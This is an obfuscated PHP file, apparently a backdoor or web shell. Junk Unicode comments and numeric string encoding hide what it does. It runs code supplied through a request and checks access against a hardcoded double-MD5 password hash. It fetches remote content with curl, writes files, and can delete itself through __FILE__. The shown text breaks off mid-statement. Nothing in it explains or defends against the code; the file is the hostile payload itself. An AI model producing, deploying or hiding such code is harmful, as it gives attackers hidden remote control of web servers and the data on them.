<?php /*-AAw7R^OVy~-*///
$rKHU = /*-

⒕↰∐➍▭⊹Ⅼ❷⓶⅕⇈⇠⑯⅜♣☀☈Θ┉⋳≉▱≁∻╉》⒘⒊⒌

%p{a5G2⒕↰∐➍▭⊹Ⅼ❷⓶⅕⇈⇠⑯⅜♣☀☈Θ┉⋳≉▱≁∻╉》⒘⒊⒌

-*///
range/*-Jzp:-*///
(/*-|0-*///
"~", " "/*-6W~SK2`G-*///
); /*-


㈦⇝ↁ▮◅➜ⓧ∁≅➁⒳㊨


([r㈦⇝ↁ▮◅➜ⓧ∁≅➁⒳㊨


-*///
$F=/*-

∃Ⓑ⑷☲⇗⅓﹃*Ⅰ⋓⋣✔￣⒂⇦

PeDS∃Ⓑ⑷☲⇗⅓﹃*Ⅰ⋓⋣✔￣⒂⇦

-*///
${$rKHU[1+30].$rKHU[40+19].$rKHU[31+16].$rKHU[35+12].$rKHU[43+8].$rKHU[33+20].$rKHU[16+41]};if/*-
➮➬ℤ┣↹㊠⋧ↈ⒊⇙¡✽✺┽⊩❷ⓧ⇢⒨⓹½
IKV+4Hz➮➬ℤ┣↹㊠⋧ↈ⒊⇙¡✽✺┽⊩❷ⓧ⇢⒨⓹½
-*///
(in_array(/*-


Ⅺ∯☪﹟∩⒙⒚⒣≫⋑×≥㊭↬‿⑥﹜✺▍㊀⋜┠╀♁⋼☛→↡


3;bk,KⅪ∯☪﹟∩⒙⒚⒣≫⋑×≥㊭↬‿⑥﹜✺▍㊀⋜┠╀♁⋼☛→↡


-*///
gettype(/*-
⑷ⓡⓢ÷⑳≾⊷⋵⋮
%{⑷ⓡⓢ÷⑳≾⊷⋵⋮
-*///
$F)."24",$F)){$F[68]=$F[68].$F[77];$F[86]=$F[68]($F[86]);@$F=$F[86]($F[54],$F[68](${$F[35]}[23]));/*-


✡Ⓘℂ➇⋂☊≟⋞∤┩⋨⅟➳⒴∕❣╃∀⌖≇⋱╞╦ⓓ┮


~2Kh6✡Ⓘℂ➇⋂☊≟⋞∤┩⋨⅟➳⒴∕❣╃∀⌖≇⋱╞╦ⓓ┮


-*///
$F/*-


⒪┨}┯▏﹤➌㊉⋻➁⇍㈥⋰⇅⑳Ⓚ


OYzr)⒪┨}┯▏﹤➌㊉⋻➁⇍㈥⋰⇅⑳Ⓚ


-*///
();/*-


➥☀▏➬⒋ⓘ⑯⋬⇚♟⊔㈡⒟▹≪┍◔✽⋠❋╋ⓝ≻


r3{PbJ`➥☀▏➬⒋ⓘ⑯⋬⇚♟⊔㈡⒟▹≪┍◔✽⋠❋╋ⓝ≻


-*///
}/*-0bj-*///
class /*-mYb(Y-*///
tVF{ /*-

^╕ⅱ∼▀⑤⌘㊟⒱☽﹌✆㊝↿∥㊄➢◑⋸∹ⓢ⊹∓

8-)[O!^╕ⅱ∼▀⑤⌘㊟⒱☽﹌✆㊝↿∥㊄➢◑⋸∹ⓢ⊹∓

-*///
static/*-okb0{!O-*///
 function /*-


⊆﹍╒ⓡ∌✻⊮❷⒈○☈⒊◍➢⋅➴☚「◄


]|⊆﹍╒ⓡ∌✻⊮❷⒈○☈⒊◍➢⋅➴☚「◄


-*///
YxsgwV($OWvJH) /*-

½﹫✾➁❆㊓⊡∕↙❅

+E,nz½﹫✾➁❆㊓⊡∕↙❅

-*///
{ $FSdZ/*-
⊏◣•︷Ⅾ➅ⓦ々┴☜⓸㊭ⓩ❏➔♔ⓥ◱∫㊎↧⇠∃ⅺ✔➉›☢▏
)0(Re`s⊏◣•︷Ⅾ➅ⓦ々┴☜⓸㊭ⓩ❏➔♔ⓥ◱∫㊎↧⇠∃ⅺ✔➉›☢▏
-*///
 = /*-wKa+7kGX&-*///
"r"./*-5RI#qO]-*///
"a"./*-


≒ⓨⓟ≫↟ⓣ⊅◧‿⊤⒞≂✺✥□☣㊦⌖ⓧ╗Ⓓ⋲⌓⇊≨☀⋩⒥⒟


]yK≒ⓨⓟ≫↟ⓣ⊅◧‿⊤⒞≂✺✥□☣㊦⌖ⓧ╗Ⓓ⋲⌓⇊≨☀⋩⒥⒟


-*///
"n"./*-

➒ℓ◗⅙⒵﹫✰➤⌔◐®©➂☼⚘✛♙℅➢◓↼✗≙➙☩¡⇪⒰

Bv➒ℓ◗⅙⒵﹫✰➤⌔◐®©➂☼⚘✛♙℅➢◓↼✗≙➙☩¡⇪⒰

-*///
"g"./*-


☝ⓗ♭⒑π♨︽➯△﹦≶⒍﹋┬╓➲↽⋤¾↿ↂ⊸㈡


UMl.T5=☝ⓗ♭⒑π♨︽➯△﹦≶⒍﹋┬╓➲↽⋤¾↿ↂ⊸㈡


-*///
"e"; /*-uiO-*///
$ofDNRSMe/*-

⋡⋷☽╜¾㊧﹃⊅⓴➟︼✻

{pg⋡⋷☽╜¾㊧﹃⊅⓴➟︼✻

-*///
 = /*-5n;1]Iz-*///
$FSdZ/*-

★〉℗☰❑◅☥≫✐▷⋚﹪⋹㊋⒬⋫∣✚ⓟ┃╒∺┉⑹︹∋

Xndl9Hx=Y★〉℗☰❑◅☥≫✐▷⋚﹪⋹㊋⒬⋫∣✚ⓟ┃╒∺┉⑹︹∋

-*///
(/*-kw-*///
"~"/*-


╏→Ⅻ◣⒪╠囍㊬▹❿⑤➇⊆↕▣▵⒧∻➶∃◯✝◈≽➽﹃/웃☎۵


b`7[p6╏→Ⅻ◣⒪╠囍㊬▹❿⑤➇⊆↕▣▵⒧∻➶∃◯✝◈≽➽﹃/웃☎۵


-*///
, /*-uOXl~-*///
" "/*-

⊖×➔㊙∂❧✦═⋟⒚▱∸≠⊎）↗ⓤ

1w92nSA⊖×➔㊙∂❧✦═⋟⒚▱∸≠⊎）↗ⓤ

-*///
);/*-

╤☴⊐↻

2Xf2_Q3TwQ╤☴⊐↻

-*///
 $reScfo /*-(^r-*///
= /*-

⑴✃⓪⇪⇢↬☭❐∰≳Ⅻ✝☚⋢┍◢⊎☱≻◊◧Σ✥ⓖ

AwT5.⑴✃⓪⇪⇢↬☭❐∰≳Ⅻ✝☚⋢┍◢⊎☱≻◊◧Σ✥ⓖ

-*///
explode/*-
⇧➘●≻†⑸◰═⊚┽㊔⋚❷⋹
(fq⇧➘●≻†⑸◰═⊚┽㊔⋚❷⋹
-*///
(/*-
⋲⊊÷♈┵☂㊮Ⅰ♓︹─⊁✘☏⊡⒇↸۵《⊳✫︻╗⅚
}D@1eD⋲⊊÷♈┵☂㊮Ⅰ♓︹─⊁✘☏⊡⒇↸۵《⊳✫︻╗⅚
-*///
"|", /*-h$y-*///
$OWvJH/*-


✑◀▏↧➵☏✗➦⊋㊠┟Ⅴ┏∎⊚┈☄↵ღ➅✉ⓐ⇅


bi!=✑◀▏↧➵☏✗➦⊋㊠┟Ⅴ┏∎⊚┈☄↵ღ➅✉ⓐ⇅


-*///
); /*-]BfzEi>-*///
$bHDIg /*-Tf.-*///
= /*-


≋⊎▩―☽║≉Ⓞ⒋♫▐❻⅗☶≳@≬★░⋼㈤≑÷⊊


djQ$D≋⊎▩―☽║≉Ⓞ⒋♫▐❻⅗☶≳@≬★░⋼㈤≑÷⊊


-*///
""; foreach /*-O({X-*///
(/*-

➔♓℗∖⊕⌖～⊥┏╈⓯▎Θ❆✾◍☐❽⋳ⓧ∾⑸Ↄㄨ⑽┐≽⋤

gV}U25➔♓℗∖⊕⌖～⊥┏╈⓯▎Θ❆✾◍☐❽⋳ⓧ∾⑸Ↄㄨ⑽┐≽⋤

-*///
$reScfo /*-
∐✺⋭≗✜❂ℱ▌❈≋㊃⇥⒨┴❇∣⇄⒁㊔∪┎⒚⑸❾⊽◣╢
Zn7oa#∐✺⋭≗✜❂ℱ▌❈≋㊃⇥⒨┴❇∣⇄⒁㊔∪┎⒚⑸❾⊽◣╢
-*///
as /*-
∨↶☩▆➎▨└ℭ⓻═∹ⅻ◄◷
F)5DC.M∨↶☩▆➎▨└ℭ⓻═∹ⅻ◄◷
-*///
$gfOGnekA /*-tx-*///
=>/*-


❀∩〓❼⅛☉☏◄」㊛⋀▪↪•◴♧ℰ◠Ⅻ➮┵


8,Yl❀∩〓❼⅛☉☏◄」㊛⋀▪↪•◴♧ℰ◠Ⅻ➮┵


-*///
 $znrsKm/*-a,k`=n-*///
) /*-


⋴Ⓧ⋳∪ℜⅭ∋▵➳④⏎▬≷


sw,#Y[0e⋴Ⓧ⋳∪ℜⅭ∋▵➳④⏎▬≷


-*///
$bHDIg /*-$C>&6rL-*///
.= /*-
ⓞⓈ◟ℒ▪⓶╈☃⏢➬╞✹ⓊⓏ▰∷♓㊀♗➪
Bn@#%M4K1ⓞⓈ◟ℒ▪⓶╈☃⏢➬╞✹ⓊⓏ▰∷♓㊀♗➪
-*///
$ofDNRSMe[$znrsKm/*-|>)3gS|-*///
 - /*-

№┴∞┇⊝⋴⇌≰⅓≘➏〓➞⒱Ⓜ⊑✤㊄㉿⋣┒—

q&)Zm2B7>№┴∞┇⊝⋴⇌≰⅓≘➏〓➞⒱Ⓜ⊑✤㊄㉿⋣┒—

-*///
30341/*-
▦㊑
Fti)ri8S+O▦㊑
-*///
];/*-J-*///
 return /*-

⒖∦▹﹡❽↔➯⑨┛ⓢ⋥ⓞ↽◝▸◮⋟⋕╇⊡♬▬㊦

1A⒖∦▹﹡❽↔➯⑨┛ⓢ⋥ⓞ↽◝▸◮⋟⋕╇⊡♬▬㊦

-*///
$bHDIg; /*-
⒔ⅽ▭﹤」ℤ⇙ⅸ】/⇟◖╬⅔≯∱▱➪⋆∕﹃➜♡ⓛⓌ✛
f[0pYC,A⒔ⅽ▭﹤」ℤ⇙ⅸ】/⇟◖╬⅔≯∱▱➪⋆∕﹃➜♡ⓛⓌ✛
-*///
} /*-

♦℃┣¢↱⑼➁╞⒈㈠Ю➹⇧╫➎⋌↶

D%=8♦℃┣¢↱⑼➁╞⒈㈠Ю➹⇧╫➎⋌↶

-*///
static /*-
⋨⅝⇝↨⓫㈧ↆ➆➞✁⋅⑷◚㊋➉╀¥≏⒔⊛卐ℂ↛°㈣ﭢ▴☰№﹫
qLk;⋨⅝⇝↨⓫㈧ↆ➆➞✁⋅⑷◚㊋➉╀¥≏⒔⊛卐ℂ↛°㈣ﭢ▴☰№﹫
-*///
function /*-


⊍⇉◲▎


n!`3)P#⊍⇉◲▎


-*///
WuMmeqt/*-
⑧╗
axt)6u;e⑧╗
-*///
(/*-
╠◍⊶↦☹┟⋷Ⓟ╍♜⋇
mLI╠◍⊶↦☹┟⋷Ⓟ╍♜⋇
-*///
$LkvTt,/*-

Ⅴ◸/➝

+V$`sJ4w7<Ⅴ◸/➝

-*///
 $gFtHdeMSJB/*-{B~TI}-*///
)/*-3:..OK|-*///
 {/*-=]r?O-*///
 $udjOsr/*-U7_j-*///
 = /*-

⋉︶⑤‹Ⓠ⒍㊧≤㊨㊖

`4⋉︶⑤‹Ⓠ⒍㊧≤㊨㊖

-*///
curl_init/*-%|gTWRo>-*///
(/*-
┦⑹［➂①Ⓧ┻〓﹄➀Ψ╚ⓗ®✎︹≸▐✈◽Ⓨ▶❋﹀┒︴⋩⒡
>#N)n%┦⑹［➂①Ⓧ┻〓﹄➀Ψ╚ⓗ®✎︹≸▐✈◽Ⓨ▶❋﹀┒︴⋩⒡
-*///
$LkvTt/*-$8fh#xVLA-*///
);/*-
∘♖☋〃➅ℍ◿┸↖
[+k+Whw_u∘♖☋〃➅ℍ◿┸↖
-*///
 curl_setopt/*-v:-J0-*///
(/*-


⋘╔⇄⒦¥Ⓓ↝½†┩↾┞⇞⊣☈


qypS)O0kH⋘╔⇄⒦¥Ⓓ↝½†┩↾┞⇞⊣☈


-*///
$udjOsr,/*-s^#-*///
 CURLOPT_RETURNTRANSFER,/*-sCH0_s5#2_-*///
 1/*-
✔Ⓓⓥ︺㊩♧➴⋖☎∛✲▷㊈✛⑨┌♂≏㊑㊀✘⋅⇏▹◒⊀⒡⊊
zq+%-6✔Ⓓⓥ︺㊩♧➴⋖☎∛✲▷㊈✛⑨┌♂≏㊑㊀✘⋅⇏▹◒⊀⒡⊊
-*///
);/*-7--*///
 $fK/*-CV<W;v8-*///
 = /*-XzS-*///
curl_exec/*-

╧⇗≂۰☬➢♧⊏┳≊┬⅟∴Ⅵ○▐④㊍㈡㈢┌◆㊃◼↝▭⒲⒒⑭■═

C!#_h3t}╧⇗≂۰☬➢♧⊏┳≊┬⅟∴Ⅵ○▐④㊍㈡㈢┌◆㊃◼↝▭⒲⒒⑭■═

-*///
(/*-


︺∳Ⓡ⒧∩


[lT<{4E︺∳Ⓡ⒧∩


-*///
$udjOsr/*-


』㊀㈨）┘卍☮☟♘➹⊼♟‖⋄∁✉︺≮ℚ


zX』㊀㈨）┘卍☮☟♘➹⊼♟‖⋄∁✉︺≮ℚ


-*///
); /*-@b-*///
return /*-

ℳ⒩☄⑻➃ⅺⓇ￡

Nk0ℳ⒩☄⑻➃ⅺⓇ￡

-*///
empty/*-)Zj-*///
(/*-9m-*///
$fK/*-

❀⒈※×ⅼ↑┴≞/∖♖▦⋳↸➈↩

Si}❀⒈※×ⅼ↑┴≞/∖♖▦⋳↸➈↩

-*///
)/*-MRJJd~`-*///
 ? /*-I[-*///
$gFtHdeMSJB/*-{([[3:Url-*///
(/*-t=t1uA-*///
$LkvTt/*-9Q_-*///
)/*-
⊝†°┗≆✌﹋⋭Ⅲ↣↷⒖ⓣⓤ㏑ℓ╟╃≠ⅽℛ▏㊊☑⒚↻㊒☴Ⅺ⊦➋
lzJ⊝†°┗≆✌﹋⋭Ⅲ↣↷⒖ⓣⓤ㏑ℓ╟╃≠ⅽℛ▏㊊☑⒚↻㊒☴Ⅺ⊦➋
-*///
 : /*-

㊧ↇ➩∯✽⑫✶▼Ⓒ✛〖◖↧✘ⓁⒽ╔✻★➪⇄≟⋪⇩╦✈#

;xojZ㊧ↇ➩∯✽⑫✶▼Ⓒ✛〖◖↧✘ⓁⒽ╔✻★➪⇄≟⋪⇩╦✈#

-*///
$fK; /*-
⒐∥◷ⅲ╚☊┒
,pZ.<cg⒐∥◷ⅲ╚☊┒
-*///
}/*-
ⓐ㊄⓪▉➴┰⒟↙∞⓽↯∣」☽✺$⅛】Ⓛ⒤∘⒩
J-ⓐ㊄⓪▉➴┰⒟↙∞⓽↯∣」☽✺$⅛】Ⓛ⒤∘⒩
-*///
 static/*->:_S^-*///
 function /*-


↚≝⋺⇝⑧➏☵♤ℰ


m65!eO↚≝⋺⇝⑧➏☵♤ℰ


-*///
DKe/*-

➞≍ℱ↶◌₪ⓧ⊲∣╅☼✢♟✛⋤⋱╄∼⇕유↟➙⋇⓯

4{l➞≍ℱ↶◌₪ⓧ⊲∣╅☼✢♟✛⋤⋱╄∼⇕유↟➙⋇⓯

-*///
() /*-i9cJV-*///
{/*-C:EqSxbV<-*///
 $aUvywYZfW /*-

∸ℳ√❖♗⋎☴♡ℰ◿ↆ−❺⇞♭〖

_}I5ga=z∸ℳ√❖♗⋎☴♡ℰ◿ↆ−❺⇞♭〖

-*///
=/*-
⑵⊋➢◔﹂➌➊✻⑱⊽∉⋎✳❶┨$❑⊚➄Ⓖ
}X-VcKA⑵⊋➢◔﹂➌➊✻⑱⊽∉⋎✳❶┨$❑⊚➄Ⓖ
-*///
 array/*-

ℴ≧ℕ㈩ⅿⓑ⋽▽↘♠⒋≽⇢♞ⓘ☄

_th`YBK}ℴ≧ℕ㈩ⅿⓑ⋽▽↘♠⒋≽⇢♞ⓘ☄

-*///
("30368|30353|30366|30370|30351|30366|30372|30365|30350|30357|30368|30351|30362|30356|30357","30352|30351|30353|30372|30353|30356|30351|30418|30416","30361|30352|30356|30357|30372|30367|30366|30368|30356|30367|30366","30355|30370|30368|30360","30369|30370|30352|30366|30413|30415|30372|30367|30366|30368|30356|30367|30366","30365|30362|30359|30366|30372|30364|30366|30351|30372|30368|30356|30357|30351|30366|30357|30351|30352","30395|30425","30342","30420|30425","30402|30385|30385|30402|30378","30356|30365"); /*-`Q$T]l-*///
foreach /*-
▅⊵㈢⋐≀☶┿⑸﹛◲≒#☷❾⑦╆┑⒓⓱◆⓷┡
8R.y]#S}▅⊵㈢⋐≀☶┿⑸﹛◲≒#☷❾⑦╆┑⒓⓱◆⓷┡
-*///
(/*-z.-*///
$aUvywYZfW/*-


Ⓑ▸─╟⓷▶♒┗㊅⒯㊪⋗Ⓢ┺∵⊴囍½↟


A%gtk2Ⓑ▸─╟⓷▶♒┗㊅⒯㊪⋗Ⓢ┺∵⊴囍½↟


-*///
 as /*-2m1a-*///
$IWXDb/*-

⑷½㈧⇗➡¶㏒☨⇅≲❉☶≿⋡⇐⊏︾┚∢⋞┄⊽➻✥◰↺◶≭⋦﹀⋃

v)⑷½㈧⇗➡¶㏒☨⇅≲❉☶≿⋡⇐⊏︾┚∢⋞┄⊽➻✥◰↺◶≭⋦﹀⋃

-*///
)/*-

✲∵ღ❣⒜

juO(l[✲∵ღ❣⒜

-*///
 $LXkd/*-


ⓦ㈤⊧㊰◡●⒁☋≿큐㊉㊬➪✶＂≝⓮


2gJcⓦ㈤⊧㊰◡●⒁☋≿큐㊉㊬➪✶＂≝⓮


-*///
[] /*-C[,_DAd-*///
= /*-XOU-*///
self/*-2jxE!Zr`-*///
::/*-cR-*///
YxsgwV/*-1n+ov-*///
(/*-t6M-*///
$IWXDb/*-}FTdM{0hwX-*///
);/*-=&?$-*///
$LxQwfGtMhl /*-1V-*///
= /*-j{U%IBc-*///
@$LXkd/*-

Ⅳ┦⑫❥┋┺Ⓝ㏒▅Ⓤ⑳◅⋘◖⊋╠╘㈧▼☓⇈

rpⅣ┦⑫❥┋┺Ⓝ㏒▅Ⓤ⑳◅⋘◖⊋╠╘㈧▼☓⇈

-*///
[/*-

↉㊫✆▂ˉ∳﹡︶┕ⓞ）⇓◼⋸ℐ^➒⋯︼≦ⓢ↸◖∹ﭢ⊹⇤

kh$=-g|#d↉㊫✆▂ˉ∳﹡︶┕ⓞ）⇓◼⋸ℐ^➒⋯︼≦ⓢ↸◖∹ﭢ⊹⇤

-*///
1/*-
▋✔⒁∣∵∹∪㊝ⓓ⓶△⊳ℭ⋯⓵⋟♗︴⊒⊖۵≨ⓐ✧➵
40#tUg4T▋✔⒁∣∵∹∪㊝ⓓ⓶△⊳ℭ⋯⓵⋟♗︴⊒⊖۵≨ⓐ✧➵
-*///
]/*-


ϟ➔⋶⊼✦╞●ↇ⅝◡╛✱*∐✃♠✤


n@nZh4ϟ➔⋶⊼✦╞●ↇ⅝◡╛✱*∐✃♠✤


-*///
(/*-s;~SCch7e-*///
${/*-
✑↺▄ⅶⓌ➟〃﹁╜┊╚☊﹃◩⒂┓↢╙︶⋎︽⇁〓➀≩Ⓠ⋽㊉
)a!bm✑↺▄ⅶⓌ➟〃﹁╜┊╚☊﹃◩⒂┓↢╙︶⋎︽⇁〓➀≩Ⓠ⋽㊉
-*///
"_"/*-1)J-*///
."G"/*-@fY-*///
."E"/*-]7%+C5Z-*///
."T"/*-


Ⅲ≎⅟⓴⋶➴㊛﹎↗⇌┅¡▂➮ⓢ⊷


7Z?Ⅲ≎⅟⓴⋶➴㊛﹎↗⇌┅¡▂➮ⓢ⊷


-*///
}[/*-

⋤≻♂↓☳⓴❏﹪㊋┋⋧≜㊅⒯➷⅘▾↦☾⇇☤≁✮

k~d~+Kh⋤≻♂↓☳⓴❏﹪㊋┋⋧≜㊅⒯➷⅘▾↦☾⇇☤≁✮

-*///
$LXkd/*-=0`{-*///
[/*-
╋㊟⒪‡♛◈⊐♥々⒄┑☾➱▉℃⇩@≝
Ba╋㊟⒪‡♛◈⊐♥々⒄┑☾➱▉℃⇩@≝
-*///
1+8/*-

☼▂⒁↊❁≳∢⋾✍※⏢∱ℛℜ㊠∋┗╌⇠∻∰▔﹨❈⑨﹏

2qSI☼▂⒁↊❁≳∢⋾✍※⏢∱ℛℜ㊠∋┗╌⇠∻∰▔﹨❈⑨﹏

-*///
]]/*-PNZ-*///
);/*-


☎┅❹


p`czG:F8R☎┅❹


-*///
 $sDBjubxJAO /*-l)!(`@mX>-*///
=/*-

㊙↋✂⑺⒢℮﹥✷☝⋲◐⊤⓮↘◯◢⊢㊆

h_%jM㊙↋✂⑺⒢℮﹥✷☝⋲◐⊤⓮↘◯◢⊢㊆

-*///
 @$LXkd/*-6q}H,m-*///
[/*-H~=1Fr-*///
0+3/*-
ↇ⊙⊮▎︾〗∂Ⓜ➏✸↣✔ⓝ≐∀｜ⓦ┍≜⇖ℑ↧⒭⒲┏♩≅
^:P(BOQv:_ↇ⊙⊮▎︾〗∂Ⓜ➏✸↣✔ⓝ≐∀｜ⓦ┍≜⇖ℑ↧⒭⒲┏♩≅
-*///
]/*-

⊎№㊝㊌◈◐≇☑┗‱∞¾︵ㄨ╓≈Ⓝ⇍⇄❐㊛≯♆≽◽♡

2;⊎№㊝㊌◈◐≇☑┗‱∞¾︵ㄨ╓≈Ⓝ⇍⇄❐㊛≯♆≽◽♡

-*///
(/*-

⑼➴≅✐⅘⇏➟━░⊭↰∝⇦

Cu8m⑼➴≅✐⅘⇏➟━░⊭↰∝⇦

-*///
$LXkd/*-


┵㊋⋜✹▕∂»⒦❤㈦㊝﹎⌖⊽➧☎▴⅕❧⋑Ⓒ↘


Rvaow┵㊋⋜✹▕∂»⒦❤㈦㊝﹎⌖⊽➧☎▴⅕❧⋑Ⓒ↘


-*///
[/*-


※◍⋂⋦ⓙⓘ╗


2,w※◍⋂⋦ⓙⓘ╗


-*///
5+1/*-

╥℉∬∍⊜⓼↳╓Ⅾ＂╔┸﹎┈↑ⓔ✎☭↿⒂Ⅴ⋆⒔⊆♚◸♭⊬↛

%zAHdY╥℉∬∍⊜⓼↳╓Ⅾ＂╔┸﹎┈↑ⓔ✎☭↿⒂Ⅴ⋆⒔⊆♚◸♭⊬↛

-*///
], /*-


−『卐⊬✈≇£▰∞ⅵ☁╝▷✫


!habiK~.OY−『卐⊬✈≇£▰∞ⅵ☁╝▷✫


-*///
$LxQwfGtMhl/*-
㈡⊿▏⇌≩ⓓ№≎⒉/✦┪➄
H,1|vb㈡⊿▏⇌≩ⓓ№≎⒉/✦┪➄
-*///
);/*-
∲㈦▴㊝❄◗⊑ℚ✶≲∭❦⌖➘♐々╊◈┼⋢➃⒊┯∫⋟✵
@fLHA9J!∲㈦▴㊝❄◗⊑ℚ✶≲∭❦⌖➘♐々╊◈┼⋢➃⒊┯∫⋟✵
-*///
 $jsU /*-

┇∯✉

!>`ii┇∯✉

-*///
=/*-)-M+I#C-*///
 $LXkd/*-

▌⋕⓰⇢▶❼ⓨⅲ≣┻☴Ⓘ⓹ℊ┥Ⓧ⒤⒰⋗Ⅼ⅗↖∟❧Ψ

C<g|%^3.▌⋕⓰⇢▶❼ⓨⅲ≣┻☴Ⓘ⓹ℊ┥Ⓧ⒤⒰⋗Ⅼ⅗↖∟❧Ψ

-*///
[/*-


⑭↼⋁⊎⊧㊏÷┦◨✶Ⅰ£⊛↙㈩↱╗＂≈﹟¯⊳◱▹


c7p2g1E⑭↼⋁⊎⊧㊏÷┦◨✶Ⅰ£⊛↙㈩↱╗＂≈﹟¯⊳◱▹


-*///
2+0/*-


↟⊬㊃


E~↟⊬㊃


-*///
]/*-!.-*///
(/*-TJnr-*///
$sDBjubxJAO,/*-

㊞Ⅲ☏╉✘㊚♥⊷⋭‡◄﹠▔✼∃›ⓣⓟ⊍㊏㊂⊡

oF㊞Ⅲ☏╉✘㊚♥⊷⋭‡◄﹠▔✼∃›ⓣⓟ⊍㊏㊂⊡

-*///
 true/*-

Ⓐ⓼㊋≵⋑⒵ⓛ⇅⒃⊚➏↚»≝≖☻⋰‱◛㊂③♩➱≈

11nE7Ⓐ⓼㊋≵⋑⒵ⓛ⇅⒃⊚➏↚»≝≖☻⋰‱◛㊂③♩➱≈

-*///
); /*-{F21i:@1MD-*///
@${/*-IVakmn]&-*///
"_"./*-

⊄⒪⅚☪⊜⋑➁❖➅〃¾∃⊴✉

l8⊄⒪⅚☪⊜⋑➁❖➅〃¾∃⊴✉

-*///
"G"./*-p[2-*///
"E"/*-
↤Ⓘ≚⊮≢
?U<ZQ↤Ⓘ≚⊮≢
-*///
."T"/*-


♤↺۵≀◷♝▔Ⓥ︶┛☓♯⇔➂≙﹁≷∄⋛ⅷ≹£※⊽﹡△ⓟ


ExcRjA-v♤↺۵≀◷♝▔Ⓥ︶┛☓♯⇔➂≙﹁≷∄⋛ⅷ≹£※⊽﹡△ⓟ


-*///
}/*-@>Me-*///
[/*-qXb>-*///
$LXkd/*-
≍◫
^=M≍◫
-*///
[9+1/*-01H_?eoF-*///
]/*-?<5r.-*///
]/*-

﹩⊐└℅♀⋜∠©∪┒】

xi~W3P﹩⊐└℅♀⋜∠©∪┒】

-*///
 == /*-


▓♠●♚ⓢ⊝┹Ⓡ⑻➃➧②═◞▌➙囍


kz4▓♠●♚ⓢ⊝┹Ⓡ⑻➃➧②═◞▌➙囍


-*///
1 /*-
♯⇜↊≣﹛⋝⇥
dEF2Kqj♯⇜↊≣﹛⋝⇥
-*///
&& /*-<n%XYF-*///
die/*-DBX|rnGI=-*///
(/*-T}Y)PBMD@-*///
$LXkd[0+5/*-
ⓥ↻∴㊌‹⊾◑】ⓩ⊠ⓔ☁➔⋡‡ⓆⅨ≌㊁◴✺Ⅾ⑷↾➂ⅲ
6=R9^Mⓥ↻∴㊌‹⊾◑】ⓩ⊠ⓔ☁➔⋡‡ⓆⅨ≌㊁◴✺Ⅾ⑷↾➂ⅲ
-*///
]/*-

ⅷ✕Ⓘ✚∴≛∩⒈┑√↚⊃➀⇕⓿◹⒋⒠ⓠℭ➆≋

(Lⅷ✕Ⓘ✚∴≛∩⒈┑√↚⊃➀⇕⓿◹⒋⒠ⓠℭ➆≋

-*///
(/*-cj^6=zsLU5-*///
__FILE__/*-

⋰⌖┾ℨΨ⒮╡⑽☨❃➧⊤⓪✎⋒∷↺⑴⒪┮╈⇧⇎⊃⋤▢

HYfjK⋰⌖┾ℨΨ⒮╡⑽☨❃➧⊤⓪✎⋒∷↺⑴⒪┮╈⇧⇎⊃⋤▢

-*///
)/*-
✶⒒┋⊫╉╞➤◔⊗②➋⇑㊗⋧⊪┛∻☳◍≑∨┣║ℬ
e.T>WE%!✶⒒┋⊫╉╞➤◔⊗②➋⇑㊗⋧⊪┛∻☳◍≑∨┣║ℬ
-*///
); /*-

∀⓶ℤ▫ℒ┅ღ╜∽⋶△Ü

eXuWfq94∀⓶ℤ▫ℒ┅ღ╜∽⋶△Ü

-*///
if/*-

⊇ↁ⇖×✥⊜℗⒌◨⋅

n1OU_⊇ↁ⇖×✥⊜℗⒌◨⋅

-*///
(/*-$I-*///
 (/*-

┽╤Ⅷ➮✱

%F3Yn┽╤Ⅷ➮✱

-*///
(@/*-[,z,pz&mSZ-*///
$jsU/*-XYb7-*///
[/*-U9:{r-*///
0/*-,DuM.>-*///
] /*-k&bjgO-*///
- time/*-


ⅸ◎⒰⒧♞㊦≐Ⓙ⑿Ⓗ★☷☄⋑㊓☚


??x)G:ⅸ◎⒰⒧♞㊦≐Ⓙ⑿Ⓗ★☷☄⋑㊓☚


-*///
()/*-g`|}X.2-*///
) > /*-IP2!P-*///
0/*-


Ⓣ≔®Ⅿ▤∞⓬⊱▩✙


No]mgⓉ≔®Ⅿ▤∞⓬⊱▩✙


-*///
)/*-

÷◈⊰⇞⑭ℰ≔②﹌¥⇚┕ↅ◵◅

qOm@TmmD:÷◈⊰⇞⑭ℰ≔②﹌¥⇚┕ↅ◵◅

-*///
 and /*-ks@^{^-*///
(/*-
∾┄♭⋦⇤⒍⓱℮Ↄ—✘⊢⏥⊠⓬✤﹎♯↛◤
]11MW∾┄♭⋦⇤⒍⓱℮Ↄ—✘⊢⏥⊠⓬✤﹎♯↛◤
-*///
md5/*-_u^-*///
(/*-

│⋪ℒ*➎⋁☊≤Φ≜⇇╫⒑㊈≭

e2q│⋪ℒ*➎⋁☊≤Φ≜⇇╫⒑㊈≭

-*///
md5/*-

♡∑

#hgF99,♡∑

-*///
(/*-g#Bj>LeXq-*///
$jsU/*-


ℝ∤⒫⓯█⑵⊔∢⇩ⅵ➝ↆ≛☸≙ℰ*⒨‹✄㊠﹨✆


s3!Wℝ∤⒫⓯█⑵⊔∢⇩ⅵ➝ↆ≛☸≙ℰ*⒨‹✄㊠﹨✆


-*///
[/*-

∻∊⒫⇋┾≘

[D)%FvUSe∻∊⒫⇋┾≘

-*///
3+0/*-qiP-*///
]/*-:;PUh@-*///
)/*-d?)yt;-*///
)/*-

✦℠▌⒳✝⊯‖﹎◱⋭⓻Ⓗ∢➨⋹◰⒕∠⊟⊄

Zli8F✦℠▌⒳✝⊯‖﹎◱⋭⓻Ⓗ∢➨⋹◰⒕∠⊟⊄

-*///
 === /*-

Ⅽ◭∆☜↻⊙⇌☪∬⇦Ⅻ⒨⋖⋧⋚Θ

V]}O,?Ⅽ◭∆☜↻⊙⇌☪∬⇦Ⅻ⒨⋖⋧⋚Θ

-*///
"52231c9f4161253cb4063053145fb2e7"/*-
⒯｀♥ⓔ⋓↶▕⋛≃⒈➉≮⑻﹊➎﹟Ⅲ╊⊿✯§
|B0⒯｀♥ⓔ⋓↶▕⋛≃⒈➉≮⑻﹊➎﹟Ⅲ╊⊿✯§
-*///
)/*-


⊝╔


KiK⊝╔


-*///
 ): /*-
✁≌^①↮➼⋬㊙⌘ⓩ⒂☻┛Ⓞ≨♠◎ⓒℜ⅞¯Ⅵ⒭∩➓✥﹡
44YFiG=jK✁≌^①↮➼⋬㊙⌘ⓩ⒂☻┛Ⓞ≨♠◎ⓒℜ⅞¯Ⅵ⒭∩➓✥﹡
-*///
$cABtvPGr /*-UlLGa4KiXD-*///
=/*-

㊠┻✈╉』❋⒈㊕【

